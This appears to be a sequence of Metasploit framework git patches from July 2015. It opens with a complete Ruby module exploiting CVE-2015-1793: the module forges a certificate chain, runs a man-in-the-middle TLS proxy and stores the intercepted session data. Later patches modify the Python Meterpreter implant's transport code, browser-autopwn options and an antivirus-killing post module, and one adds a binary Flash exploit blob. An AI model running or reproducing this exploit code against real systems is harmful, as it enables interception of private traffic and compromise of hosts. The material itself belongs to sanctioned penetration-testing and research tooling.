+      'Name'        => 'OpenSSL Alternative Chains Certificate Forgery MITM Proxy',
+      'Description'    => %q{
+        This module exploits a logic error in OpenSSL by impersonating the server
+        and sending a specially-crafted chain of certificates, resulting in
+        certain checks on untrusted certificates to be bypassed on the client,
+        allowing it to use a valid leaf certificate as a CA certificate to sign a
+        fake certificate. The SSL/TLS session is then proxied to the server
+        allowing the session to continue normally and application data transmitted
+        between the peers to be saved. This module requires an active
+        man-in-the-middle attack.
+      },
+      'Author'      =>
+        [
+          'Ramon de C Valle'
+        ],
+      'License' => MSF_LICENSE,
+      'Actions'     =>
+        [
+          [ 'Service' ]
+        ],
+      'PassiveActions' =>
+        [
+          'Service'
+        ],
+      'DefaultAction'  => 'Service',
+      'References' => [
+        ['CVE', '2015-1793'],
+        ['CWE', '754'],
+        ['URL', 'http://www.openssl.org/news/secadv_20150709.txt'],
+        ['URL', 'http://git.openssl.org/?p=openssl.git;a=commit;h=f404943bcab4898d18f3ac1b36479d1d7bbbb9e6']
+      ],
+      'DisclosureDate' => 'Jul 9 2015'
+    )
+
+    register_options(
+      [
+        OptString.new('CACERT', [ true, "The leaf certificate's CA certificate", nil]),
+        OptString.new('CERT', [ true, 'The leaf certificate', nil]),
+        OptString.new('KEY', [ true, "The leaf certificate's private key", nil]),
+        OptString.new('PASSPHRASE', [ false, "The pass phrase for the leaf certificate's private key", nil]),
+        OptString.new('SUBJECT', [ false, "The subject field for the fake certificate", '/C=US/ST=California/L=Mountain View/O=Example Inc/CN=*.example.com']),
+        OptString.new('HOST', [ true, 'The server address', nil]),
+        OptString.new('PORT', [ true, 'The server port', 443]),
+        OptString.new('SRVHOST', [ true, 'The proxy address', '0.0.0.0']),
+        OptString.new('SRVPORT', [ true, 'The proxy port', 443])
+      ], self.class)
+  end
+
+  def run
+    host = datastore['HOST']
+    port = datastore['PORT']
+    local_host = datastore['SRVHOST']
+    local_port = datastore['SRVPORT']
+
+    root_ca_name = OpenSSL::X509::Name.parse('/C=US/O=Root Inc./CN=Root CA')
+    root_ca_key = OpenSSL::PKey::RSA.new(2048)
+    root_ca_cert = OpenSSL::X509::Certificate.new
+    root_ca_cert.issuer = OpenSSL::X509::Name.parse('/C=US/O=Root Inc./CN=Root CA')
+    root_ca_cert.not_after = Time.now + 86400
+    root_ca_cert.not_before = Time.now
+    root_ca_cert.public_key = root_ca_key.public_key
+    root_ca_cert.serial = 0
+    root_ca_cert.subject = root_ca_name
+    root_ca_cert.version = 2
+    extension_factory = OpenSSL::X509::ExtensionFactory.new(root_ca_cert, root_ca_cert)
+    root_ca_cert.add_extension(extension_factory.create_extension('basicConstraints', 'CA:TRUE', true))
+    root_ca_cert.add_extension(extension_factory.create_extension('keyUsage', 'keyCertSign,cRLSign', true))
+    root_ca_cert.add_extension(extension_factory.create_extension('subjectKeyIdentifier', 'hash'))
+    root_ca_cert.sign(root_ca_key, OpenSSL::Digest::SHA1.new)
+
+    inter_ca_name = OpenSSL::X509::Name.parse('/C=US/O=Intermediate Inc./CN=Intermediate CA')
+    inter_ca_key = OpenSSL::PKey::RSA.new(2048)
+    inter_ca_cert = OpenSSL::X509::Certificate.new
+    inter_ca_cert.issuer = root_ca_name
+    inter_ca_cert.not_after = Time.now + 86400
+    inter_ca_cert.not_before = Time.now
+    inter_ca_cert.public_key = inter_ca_key.public_key
+    inter_ca_cert.serial = 0
+    inter_ca_cert.subject = inter_ca_name
+    inter_ca_cert.version = 2
+    extension_factory = OpenSSL::X509::ExtensionFactory.new(root_ca_cert, inter_ca_cert)
+    inter_ca_cert.add_extension(extension_factory.create_extension('basicConstraints', 'CA:TRUE', true))
+    inter_ca_cert.add_extension(extension_factory.create_extension('keyUsage', 'keyCertSign,cRLSign', true))
+    inter_ca_cert.add_extension(extension_factory.create_extension('subjectKeyIdentifier', 'hash'))
+    inter_ca_cert.sign(root_ca_key, OpenSSL::Digest::SHA1.new)
+
+    subinter_ca_cert = OpenSSL::X509::Certificate.new(File.read(datastore['CACERT']))
+    subinter_ca_cert.issuer = inter_ca_name
+    subinter_ca_cert.sign(inter_ca_key, OpenSSL::Digest::SHA1.new)
+    leaf_key = OpenSSL::PKey::RSA.new(File.read(datastore['KEY']), datastore['PASSPHRASE'])
+    leaf_cert = OpenSSL::X509::Certificate.new(File.read(datastore['CERT']))
+
+    fake_name = OpenSSL::X509::Name.parse(datastore['SUBJECT'])
+    fake_key = OpenSSL::PKey::RSA.new(2048)
+    fake_cert = OpenSSL::X509::Certificate.new
+    fake_cert.issuer = leaf_cert.subject
+    fake_cert.not_after = Time.now + 3600
+    fake_cert.not_before = Time.now
+    fake_cert.public_key = fake_key.public_key
+    fake_cert.serial = 0
+    fake_cert.subject = fake_name
+    fake_cert.version = 2
+    extension_factory = OpenSSL::X509::ExtensionFactory.new(leaf_cert, fake_cert)
+    fake_cert.add_extension(extension_factory.create_extension('basicConstraints', 'CA:FALSE', true))
+    fake_cert.add_extension(extension_factory.create_extension('keyUsage', 'digitalSignature,nonRepudiation,keyEncipherment'))
+    fake_cert.add_extension(extension_factory.create_extension('subjectKeyIdentifier', 'hash'))
+    fake_cert.sign(leaf_key, OpenSSL::Digest::SHA1.new)
+
+    context = OpenSSL::SSL::SSLContext.new
+    context.cert = fake_cert
+    context.extra_chain_cert = [leaf_cert, subinter_ca_cert]
+    context.key = fake_key
+
+    tcp_server = TCPServer.new(local_host, local_port)
+    proxy = OpenSSL::SSL::SSLServer.new(tcp_server, context)
+    print_status('Listening on %s:%d' % [proxy.addr[2], proxy.addr[1]])
+
+    thread_num = 0
+
+    loop do
+      framework.threads.spawn("Thread #{thread_num += 1}", false, proxy.accept) do |client|
+        application_data = ''
+
+        print_status('Accepted connection from %s:%d' % [client.addr[2], client.addr[1]])
+
+        server = Rex::Socket::Tcp.create(
+          'PeerHost' => host,
+          'PeerPort' => port,
+          'SSL'      => true,
+          'SSLVerifyMode' => 'NONE',
+          'Context'  =>
+            {
+              'Msf'        => framework,
+              'MsfExploit' => self
+            })
+
+        print_status('Connected to %s:%d' % [host, port])
+
+        begin
+          loop do
+            readable, _, _ = IO.select([client, server])
+
+            readable.each do |r|
+              data = r.readpartial(4096)
+              print_status('%d bytes received' % [data.bytesize])
+
+              application_data << data
+
+              case r
+              when client
+                count = server.write(data)
+                server.flush
+                print_status('%d bytes sent' % [count])
+
+              when server
+                count = client.write(data)
+                client.flush
+                print_status('%d bytes sent' % [count])
+              end
+            end
+          end
+
+        rescue EOFError, Errno::ECONNRESET
+          path = store_loot(
+            'tls.application_data',
+            'application/octet-stream',
+            client.addr[2],
+            application_data,
+            'application_data',
+            'TLS session application data'
+          )
+
+          print_good("SSL/TLS session application data successfully stored in #{path}")
+
+          client.close
+          server.close
+
+          next
+        end
+
+        client.close
+        server.close
+      end
+    end
+
+    proxy.close
+  end
+
+end

From 0929b54cd32cca40c9dc84b614d53ebb628fcc04 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 16 Jul 2015 00:43:08 -0500
Subject: [PATCH 0804/1013] Update spec for notes help menu

---
 spec/lib/msf/ui/console/command_dispatcher/db_spec.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb b/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb
index 530ed1d55d..28cd600b02 100644
--- a/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb
+++ b/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb
@@ -435,6 +435,7 @@ describe Msf::Ui::Console::CommandDispatcher::Db do
           "  -h,--help                 Show this help information",
           "  -R,--rhosts               Set RHOSTS from the results of the search",
           "  -S,--search               Regular expression to match for search",
+          "  -o,--output               Save the notes to a csv file",
           "  --sort <field1,field2>    Fields to sort by (case sensitive)",
           "Examples:",
           "  notes --add -t apps -n 'winzip' 10.1.1.34 10.1.20.41",

From e1b1db9f88b504e395a511797f017ed4769e6b1c Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Thu, 16 Jul 2015 23:03:49 +1000
Subject: [PATCH 0805/1013] Fix stupid typo

---
 modules/post/windows/manage/killav.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/post/windows/manage/killav.rb b/modules/post/windows/manage/killav.rb
index c470c62117..b0d88f4c2e 100644
--- a/modules/post/windows/manage/killav.rb
+++ b/modules/post/windows/manage/killav.rb
@@ -40,7 +40,7 @@ class Metasploit4 < Msf::Post
         print_status("Attempting to terminate '#{x['name']}' (PID: #{x['pid']}) ...")
         begin
           client.sys.process.kill(x['pid'])
-          process_killed += 1
+          processes_killed += 1
           print_good("#{x['name']} terminated.")
         rescue Rex::Post::Meterpreter::RequestError
           print_error("Failed to terminate '#{x['name']}' (PID: #{x['pid']}).")

From 0cb5000e48dc200adcd1ef25709540635e62d89d Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Thu, 16 Jul 2015 10:29:36 -0400
Subject: [PATCH 0806/1013] Pymet use incremental backoff for http recv pkt

---
 data/meterpreter/meterpreter.py | 129 ++++++++++++++++----------------
 1 file changed, 65 insertions(+), 64 deletions(-)

diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py
index fd079e4835..8a0e79b515 100644
--- a/data/meterpreter/meterpreter.py
+++ b/data/meterpreter/meterpreter.py
@@ -409,7 +409,6 @@ class Transport(object):
 	def __init__(self):
 		self.communication_timeout = SESSION_COMMUNICATION_TIMEOUT
 		self.communication_last = 0
-		self.communication_active = False
 		self.retry_total = SESSION_RETRY_TOTAL
 		self.retry_wait = SESSION_RETRY_WAIT
 
@@ -446,7 +445,6 @@ class Transport(object):
 				activate_succeeded = False
 			if activate_succeeded:
 				self.communication_last = time.time()
-				self.communication_active = True
 				return True
 			time.sleep(self.retry_wait)
 		return False
@@ -460,11 +458,9 @@ class Transport(object):
 		except:
 			pass
 		self.communication_last = 0
-		self.communication_active = False
 		return True
 
 	def get_packet(self):
-		self.communication_active = False
 		try:
 			pkt = self._get_packet()
 		except:
@@ -472,16 +468,13 @@ class Transport(object):
 		if pkt is None:
 			return None
 		self.communication_last = time.time()
-		self.communication_active = True
 		return pkt
 
 	def send_packet(self, pkt):
 		try:
 			self._send_packet(pkt)
 		except:
-			self.communication_active = False
 			return False
-		self.communication_active = True
 		self.communication_last = time.time()
 		return True
 
@@ -501,7 +494,7 @@ class HttpTransport(Transport):
 		super(HttpTransport, self).__init__()
 		opener_args = []
 		scheme = url.split(':', 1)[0]
-		if scheme == 'https' and ((sys.version_info[0] == 2 and sys.version_info >= (2,7,9)) or sys.version_info >= (3,4,3)):
+		if scheme == 'https' and ((sys.version_info[0] == 2 and sys.version_info >= (2, 7, 9)) or sys.version_info >= (3, 4, 3)):
 			import ssl
 			ssl_ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
 			ssl_ctx.check_hostname = False
@@ -518,6 +511,7 @@ class HttpTransport(Transport):
 		self.url = url
 		self._http_request_headers = {'Content-Type': 'application/octet-stream'}
 		self._first_packet = None
+		self._empty_cnt = 0
 
 	def _activate(self):
 		return True
@@ -537,13 +531,23 @@ class HttpTransport(Transport):
 		request = urllib.Request(self.url, bytes('RECV', 'UTF-8'), self._http_request_headers)
 		url_h = urllib.urlopen(request, timeout=self.communication_timeout)
 		packet = url_h.read()
-		if packet == '':
-			return ''
-		if len(packet) < 8:
-			return None  # looks corrupt
-		pkt_length, _ = struct.unpack('>II', packet[:8])
-		if len(packet) != pkt_length:
-			return None  # looks corrupt
+		for _ in range(1):
+			if packet == '':
+				break
+			if len(packet) < 8:
+				packet = None  # looks corrupt
+				break
+			pkt_length, _ = struct.unpack('>II', packet[:8])
+			if len(packet) != pkt_length:
+				packet = None  # looks corrupt
+		if not packet:
+			delay = 10 * self._empty_cnt
+			if self._empty_cnt >= 0:
+				delay *= 10
+			self._empty_cnt += 1
+			time.sleep(float(min(10000, delay)) / 1000)
+			return packet
+		self._empty_cnt = 0
 		return packet[8:]
 
 	def _send_packet(self, packet):
@@ -747,63 +751,60 @@ class PythonMeterpreter(object):
 
 	def run(self):
 		while self.running and not self.session_has_expired:
-			request = None
-			should_get_packet = self.transport.communication_active or ((time.time() - self.transport.communication_last) > 0.75)
-			if should_get_packet:
-				request = self.get_packet()
+			request = self.get_packet()
 			if request:
 				response = self.create_response(request)
 				if response:
 					self.send_packet(response)
-			else:
-				# iterate over the keys because self.channels could be modified if one is closed
-				channel_ids = list(self.channels.keys())
-				for channel_id in channel_ids:
-					channel = self.channels[channel_id]
-					data = bytes()
-					if isinstance(channel, STDProcess):
-						if not channel_id in self.interact_channels:
-							continue
-						if channel.stderr_reader.is_read_ready():
-							data = channel.stderr_reader.read()
-						elif channel.stdout_reader.is_read_ready():
-							data = channel.stdout_reader.read()
-						elif channel.poll() != None:
+				continue
+			# iterate over the keys because self.channels could be modified if one is closed
+			channel_ids = list(self.channels.keys())
+			for channel_id in channel_ids:
+				channel = self.channels[channel_id]
+				data = bytes()
+				if isinstance(channel, STDProcess):
+					if not channel_id in self.interact_channels:
+						continue
+					if channel.stderr_reader.is_read_ready():
+						data = channel.stderr_reader.read()
+					elif channel.stdout_reader.is_read_ready():
+						data = channel.stdout_reader.read()
+					elif channel.poll() != None:
+						self.handle_dead_resource_channel(channel_id)
+				elif isinstance(channel, MeterpreterSocketClient):
+					while select.select([channel.fileno()], [], [], 0)[0]:
+						try:
+							d = channel.recv(1)
+						except socket.error:
+							d = bytes()
+						if len(d) == 0:
 							self.handle_dead_resource_channel(channel_id)
-					elif isinstance(channel, MeterpreterSocketClient):
-						while select.select([channel.fileno()], [], [], 0)[0]:
-							try:
-								d = channel.recv(1)
-							except socket.error:
-								d = bytes()
-							if len(d) == 0:
-								self.handle_dead_resource_channel(channel_id)
-								break
-							data += d
-					elif isinstance(channel, MeterpreterSocketServer):
-						if select.select([channel.fileno()], [], [], 0)[0]:
-							(client_sock, client_addr) = channel.accept()
-							server_addr = channel.getsockname()
-							client_channel_id = self.add_channel(MeterpreterSocketClient(client_sock))
-							pkt  = struct.pack('>I', PACKET_TYPE_REQUEST)
-							pkt += tlv_pack(TLV_TYPE_METHOD, 'tcp_channel_open')
-							pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, client_channel_id)
-							pkt += tlv_pack(TLV_TYPE_CHANNEL_PARENTID, channel_id)
-							pkt += tlv_pack(TLV_TYPE_LOCAL_HOST, inet_pton(channel.family, server_addr[0]))
-							pkt += tlv_pack(TLV_TYPE_LOCAL_PORT, server_addr[1])
-							pkt += tlv_pack(TLV_TYPE_PEER_HOST, inet_pton(client_sock.family, client_addr[0]))
-							pkt += tlv_pack(TLV_TYPE_PEER_PORT, client_addr[1])
-							pkt  = struct.pack('>I', len(pkt) + 4) + pkt
-							self.send_packet(pkt)
-					if data:
+							break
+						data += d
+				elif isinstance(channel, MeterpreterSocketServer):
+					if select.select([channel.fileno()], [], [], 0)[0]:
+						(client_sock, client_addr) = channel.accept()
+						server_addr = channel.getsockname()
+						client_channel_id = self.add_channel(MeterpreterSocketClient(client_sock))
 						pkt  = struct.pack('>I', PACKET_TYPE_REQUEST)
-						pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_write')
-						pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
-						pkt += tlv_pack(TLV_TYPE_CHANNEL_DATA, data)
-						pkt += tlv_pack(TLV_TYPE_LENGTH, len(data))
-						pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
+						pkt += tlv_pack(TLV_TYPE_METHOD, 'tcp_channel_open')
+						pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, client_channel_id)
+						pkt += tlv_pack(TLV_TYPE_CHANNEL_PARENTID, channel_id)
+						pkt += tlv_pack(TLV_TYPE_LOCAL_HOST, inet_pton(channel.family, server_addr[0]))
+						pkt += tlv_pack(TLV_TYPE_LOCAL_PORT, server_addr[1])
+						pkt += tlv_pack(TLV_TYPE_PEER_HOST, inet_pton(client_sock.family, client_addr[0]))
+						pkt += tlv_pack(TLV_TYPE_PEER_PORT, client_addr[1])
 						pkt  = struct.pack('>I', len(pkt) + 4) + pkt
 						self.send_packet(pkt)
+				if data:
+					pkt  = struct.pack('>I', PACKET_TYPE_REQUEST)
+					pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_write')
+					pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
+					pkt += tlv_pack(TLV_TYPE_CHANNEL_DATA, data)
+					pkt += tlv_pack(TLV_TYPE_LENGTH, len(data))
+					pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
+					pkt  = struct.pack('>I', len(pkt) + 4) + pkt
+					self.send_packet(pkt)
 
 	def handle_dead_resource_channel(self, channel_id):
 		del self.channels[channel_id]

From 010e48919eec8b66538fe54e77a26ce95607c4a6 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Thu, 16 Jul 2015 11:00:43 -0400
Subject: [PATCH 0807/1013] Pymet immediately change transports on tcp failure

---
 data/meterpreter/meterpreter.py | 12 ++++++++++--
 1 file changed, 10 insertions(+), 2 deletions(-)

diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py
index 8a0e79b515..a2b1a4a307 100644
--- a/data/meterpreter/meterpreter.py
+++ b/data/meterpreter/meterpreter.py
@@ -411,6 +411,7 @@ class Transport(object):
 		self.communication_last = 0
 		self.retry_total = SESSION_RETRY_TOTAL
 		self.retry_wait = SESSION_RETRY_WAIT
+		self.request_retire = False
 
 	def __repr__(self):
 		return "<{0} url='{1}' >".format(self.__class__.__name__, self.url)
@@ -419,6 +420,10 @@ class Transport(object):
 	def communication_has_expired(self):
 		return self.communication_last + self.communication_timeout < time.time()
 
+	@property
+	def should_retire(self):
+		return self.communication_has_expired or self.request_retire
+
 	@staticmethod
 	def from_request(request):
 		url = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
@@ -461,6 +466,7 @@ class Transport(object):
 		return True
 
 	def get_packet(self):
+		self.request_retire = False
 		try:
 			pkt = self._get_packet()
 		except:
@@ -471,6 +477,7 @@ class Transport(object):
 		return pkt
 
 	def send_packet(self, pkt):
+		self.request_retire = False
 		try:
 			self._send_packet(pkt)
 		except:
@@ -622,6 +629,7 @@ class TcpTransport(Transport):
 			return ''
 		packet = self.socket.recv(8)
 		if packet == '':  # remote is closed
+			self.request_retire = True
 			return None
 		if len(packet) != 8:
 			if first and len(packet) == 4:
@@ -703,13 +711,13 @@ class PythonMeterpreter(object):
 
 	def get_packet(self):
 		pkt = self.transport.get_packet()
-		if pkt is None and self.transport.communication_has_expired:
+		if pkt is None and self.transport.should_retire:
 			self.transport_change()
 		return pkt
 
 	def send_packet(self, packet):
 		send_succeeded = self.transport.send_packet(packet)
-		if not send_succeeded and self.transport.communication_has_expired:
+		if not send_succeeded and self.transport.should_retire:
 			self.transport_change()
 		return send_succeeded
 

From 8d0e34dbc08930e53c66a3635feaebbee9ed9d73 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 16 Jul 2015 11:00:15 -0500
Subject: [PATCH 0808/1013] Resolve #5738, make the LHOST option visible

Resolve #5738
---
 modules/auxiliary/server/browser_autopwn2.rb | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/modules/auxiliary/server/browser_autopwn2.rb b/modules/auxiliary/server/browser_autopwn2.rb
index 382e6007e9..b1a472c7ba 100644
--- a/modules/auxiliary/server/browser_autopwn2.rb
+++ b/modules/auxiliary/server/browser_autopwn2.rb
@@ -73,7 +73,8 @@ class Metasploit3 < Msf::Auxiliary
     register_options(
       [
         OptRegexp.new('INCLUDE_PATTERN', [false, 'Pattern search to include specific modules']),
-        OptRegexp.new('EXCLUDE_PATTERN', [false, 'Pattern search to exclude specific modules'])
+        OptRegexp.new('EXCLUDE_PATTERN', [false, 'Pattern search to exclude specific modules']),
+
       ], self.class)
 
     register_advanced_options([
@@ -91,6 +92,7 @@ class Metasploit3 < Msf::Auxiliary
     DEFAULT_PAYLOADS.each_pair do |platform, payload_info|
       opts << OptString.new("PAYLOAD_#{platform.to_s.upcase}", [true, "Payload for #{platform} browser exploits", payload_info[:payload] ])
       opts << OptInt.new("PAYLOAD_#{platform.to_s.upcase}_LPORT", [true, "Payload LPORT for #{platform} browser exploits", payload_info[:lport]])
+      opts << OptAddress.new("LHOST", [true, "The local host for the exploits and handlers", Rex::Socket.source_address])
     end
 
     opts

From 449c751521d87fd8a80c2092986d293192efb4bb Mon Sep 17 00:00:00 2001
From: Ramon de C Valle <rcvalle@rcvalle.com>
Date: Thu, 16 Jul 2015 09:24:50 -0700
Subject: [PATCH 0809/1013] Add missing info

---
 .../server/openssl_altchainsforgery_mitm_proxy.rb        | 9 +++++++--
 1 file changed, 7 insertions(+), 2 deletions(-)

diff --git a/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb b/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb
index e8143e1413..a6bd6eab9c 100644
--- a/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb
+++ b/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb
@@ -20,8 +20,13 @@ class Metasploit3 < Msf::Auxiliary
         allowing it to use a valid leaf certificate as a CA certificate to sign a
         fake certificate. The SSL/TLS session is then proxied to the server
         allowing the session to continue normally and application data transmitted
-        between the peers to be saved. This module requires an active
-        man-in-the-middle attack.
+        between the peers to be saved.
+
+        The valid leaf certificate must not contain the keyUsage extension or it
+        must have at least the keyCertSign bit set (see X509_check_issued function
+        in crypto/x509v3/v3_purp.c); otherwise; X509_verify_cert fails with
+        X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT_LOCALLY. This module requires an
+        active man-in-the-middle attack.
       },
       'Author'      =>
         [

From 1fdbcc71c1f0a94b3d3baf91e632cc0111c6a84b Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 16 Jul 2015 14:10:49 -0500
Subject: [PATCH 0810/1013] Support URIHOST and URIPORT for exploit URI
 generation

---
 lib/msf/core/exploit/browser_autopwn2.rb | 11 +++++++++--
 1 file changed, 9 insertions(+), 2 deletions(-)

diff --git a/lib/msf/core/exploit/browser_autopwn2.rb b/lib/msf/core/exploit/browser_autopwn2.rb
index 7559adb18e..a5802f0ab7 100644
--- a/lib/msf/core/exploit/browser_autopwn2.rb
+++ b/lib/msf/core/exploit/browser_autopwn2.rb
@@ -659,12 +659,19 @@ module Msf
         # We haven't URIHOST and URIPORT into account here because
         # the framework uses them only on `get_uri`
         host = ''
-        if datastore['SRVHOST'] && datastore['SRVHOST'] != '0.0.0.0'
+        if datastore['URIHOST'] && datastore['URIHOST'] != '0.0.0.0'
+          host = datastore['URIHOST']
+        elsif datastore['SRVHOST'] && datastore['SRVHOST'] != '0.0.0.0'
           host = datastore['SRVHOST']
         else
           host = Rex::Socket.source_address
         end
-        port = datastore['SRVPORT']
+        if datastore['URIPORT'] && datastore['URIPORT'] != 0
+          port = datastore['URIPORT']
+        else
+          port = datastore['SRVPORT']
+        end
+
         resource = mod.datastore['URIPATH']
         url = "#{proto}://#{host}:#{port}#{resource}"
         urls << url

From da445a52aa822da57b8d22cc2f4dc96155787b27 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 16 Jul 2015 14:27:46 -0500
Subject: [PATCH 0811/1013] Update URIHOST and URIPORT

---
 lib/msf/core/exploit/browser_autopwn2.rb | 20 +++++++++++++++++---
 1 file changed, 17 insertions(+), 3 deletions(-)

diff --git a/lib/msf/core/exploit/browser_autopwn2.rb b/lib/msf/core/exploit/browser_autopwn2.rb
index a5802f0ab7..6fe093cc08 100644
--- a/lib/msf/core/exploit/browser_autopwn2.rb
+++ b/lib/msf/core/exploit/browser_autopwn2.rb
@@ -136,6 +136,8 @@ module Msf
       xploit.datastore['Retries']     = datastore['Retries'] if datastore['Retries']
       xploit.datastore['SSL']         = datastore['SSL'] if datastore['SSL']
       xploit.datastore['SSLVersion']  = datastore['SSLVersion'] if datastore['SSLVersion']
+      xploit.datastore['URIHOST']     = datastore['URIHOST'] if datastore['URIHOST']
+      xploit.datastore['URIPORT']     = datastore['URIPORT'] if datastore['URIPORT']
       xploit.datastore['LHOST']       = get_payload_lhost
 
       # Set options only configurable by BAP.
@@ -562,9 +564,21 @@ module Msf
       super
       show_ready_exploits
       proto = (datastore['SSL'] ? "https" : "http")
-      srvhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
-      srvport = datastore['SRVPORT']
-      port = datastore['URIPORT'] == 0 ? datastore['SRVPORT'] : datastore['URIPORT']
+
+      if datastore['URIHOST'] && datastore['URIHOST'] != '0.0.0.0'
+        srvhost = datastore['URIHOST']
+      elsif datastore['SRVHOST'] && datastore['SRVHOST'] != '0.0.0.0'
+        srvhost = datastore['SRVHOST']
+      else
+        srvhost = Rex::Socket.source_address
+      end
+
+      if datastore['URIPORT'] && datastore['URIPORT'] != 0
+        srvport = datastore['URIPORT']
+      else
+        srvport = datastore['SRVPORT']
+      end
+
       service_uri = "#{proto}://#{srvhost}:#{srvport}#{get_resource}"
       print_good("Please use the following URL for the browser attack:")
       print_good("BrowserAutoPwn URL: #{service_uri}")

From 255d8ed096cf25b7207ea8e9b4553f66911b00da Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Thu, 16 Jul 2015 14:56:32 -0500
Subject: [PATCH 0812/1013] Improve adobe_flash_opaque_background_uaf

---
 data/exploits/CVE-2015-5122/msf.swf           | Bin 43267 -> 43233 bytes
 .../source/exploits/CVE-2015-5122/Exploit.as  |  13 +-
 .../exploits/CVE-2015-5122/Exploiter.as       | 146 +++++++-----------
 .../source/exploits/CVE-2015-5122/Logger.as   |   2 +-
 .../source/exploits/CVE-2015-5122/MyClass.as  | 100 ++++++------
 .../adobe_flash_opaque_background_uaf.rb      |  29 ++--
 6 files changed, 128 insertions(+), 162 deletions(-)

diff --git a/data/exploits/CVE-2015-5122/msf.swf b/data/exploits/CVE-2015-5122/msf.swf
index 7a333645563f5ebf6bf37f5b917a2cf63fb6dc67..08b95c4261f600505d7c48bac240c22c2d9e47e9 100755
GIT binary patch
delta 41336
zcmV)AK*Ya;(gNYp0)InSQyua|0RVUb)V+6L8^@h5zOw~`N`k$qKoTg55(^3mlB%RA
zLd9xUvE>5M00@Y**#dwnsdS4=s#Bb1JCsxGG$(PKUhLGnOL7TGovpjP%O%%d{O&HN
z&HG(>SM@&M*<BDIDat<I`{PGxW-(>I^PSnL-!|tZJ}XHzlYf%5hDm$M>Lf{eOT|x^
zByG<OrMDj26ZM@R8y(MXMQBIUa4t8wwY~k^xpQsj!fg|oGws2io}TtVs67;FMUK|&
zh4EbceCv32L(@(HU{5NW%#2LtMkdC61TdbMn9A*FYBHe?CG$Whr!u1g<WRCbHJTbr
zjpwrM!L}d(4SyxKrYACE@!Zb%<mBi`GEU&y&$niWCz5xai=R!krbpx1;qC1U8R?ze
zNNzN>vu|i3k@7`HQ|EmhzP^R`MQ$StWgc2UbZ0>|<Mei0a$>A~GBYtWl>|;{fD$hk
zzCs`-rxK$h+2K@X=hXOJ;}hq`MXrTd%9G5b;<<_99Di0ErH{tP&rHS7q;?J*7H{Xn
z0>^kRwe!H#s4p04@r44xP6G{!-QG^EThQ8O3_jpasl+=~clb!_(Z1uyZ$5Htk2G6~
zuUz!E$NRFfUFw&wUcGv&Q$dmqPPJXU)yQ?*v%?=ej6U)E&VlojqZ1=J>G{egO_C5L
zSutLzjej!l;#Ndw|JK`2W>cB$?RQSa$8X;=k(?4A_4fXo23iUG*3MukbbB_F+_uep
zr!AiK?2czsk&Zp7<it=aV;?);HkBJ0%_@mVhnCHuWz>=Jk(@U^G&FD)UF6_MHkTSt
zWi%0Ti+<3SqLge&-<~}Kdj?M&89aWXZ|^{<S${^m`BcwNj0~}q3xEeF;}=FJ;zN8g
zp39{&<IaN!q%!-*(-R&8;?PKTax{KH%}h+>oRrl_bxy`J@v#)%$;y+Xo`qWYLp|%v
zUbN7I`i_U&LxDh~Jux*hnj0CfEP}oD_+(}zm+}`!?lB5JlDIRK%=J%Tbd8|4Yl}1O
zAAbi1@nmk~Y|6;kP@G-_WR;O-w9!`4Y?L0)CDC*3sAZ1Enw%ZB9ZQ`-jhK&}VOw}6
zg`{N4HY7fbD>t$GLN3*p$;2<9)kN!6WKv@jXHx>A^;!6#3;h_HS$-mOfm)~1Y$A-N
zk+bNxTj^ug3=W=|7|cx!4yDo*#^4?tPJfL~Dw7jgB^2y-85oOx;K&!Ngu1$I$8(vH
z@iR&|7*RTU!ZxD`ZAK%ME~=ZSs2R$ZG+K30dcLh!S=c2pZkM1K?hGrzuC6kTRcqC9
zwX3>9tF4jkb+xRX)z{ZI)UT>vUB9L}ptzZ0<93JB<@S`6GG#rNRnBZ&;hfpI;(y?(
zlPhknlyI$_E0tWS;!3rnhH<vm;bUA`$L)<=*~pb9&NgwSnJb$)-@?5?u7tV5xE66R
znJZmf?dDn!*S2zPn<`1NB-uR@v)fu8WNtTxy)4;USz9|?2(AOJb31F>f#*(E-{5da
zOqF{vu9;NXE7eMjmGnw=5|h<FNq=UT7?{H9_W+ElsYtXtl-a;u5$ka7_?@Dc&IWYX
zY>XXX(y)xsen~HjDQV?wxkHj>qpH;GEt4d@Jf_8LX<M4lrq!q>H|rGuB5SI{`ECX%
zRkMLBtW>JH!n~~Z3M-TA^qSe2V>azfyP^)3cBehVC3<a9OzHhE>2)!0+JD=!zGcI1
